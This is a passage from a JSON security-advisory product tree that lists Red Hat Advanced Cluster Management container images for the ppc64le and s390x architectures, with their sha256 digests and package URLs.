"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3Ae539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915598"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3A35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915573"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3A71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915621"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3Abc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915649"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3A34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775566178"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3Ad24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915641"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3Abd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915647"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3A177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915649"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3A1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775657510"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3A893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915751"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3A7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915751"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3A131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915823"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3Ad814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774984227"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3A696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915148"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3A95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3A81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915147"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3Ac9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775441299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3Accc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3A0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775116130"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3Ae8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915416"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3A0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915330"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3A0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915336"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3Ae58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3A428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774950654"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3Af3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915373"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3A0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915432"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3Aca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915327"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3A796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915355"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3A33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775630574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3Aa2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915418"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3A55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775466899"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3A6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915508"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3Ac227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775326442"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3Afdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915504"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3A24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915540"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3A8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915538"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3A7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775585006"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"product": {
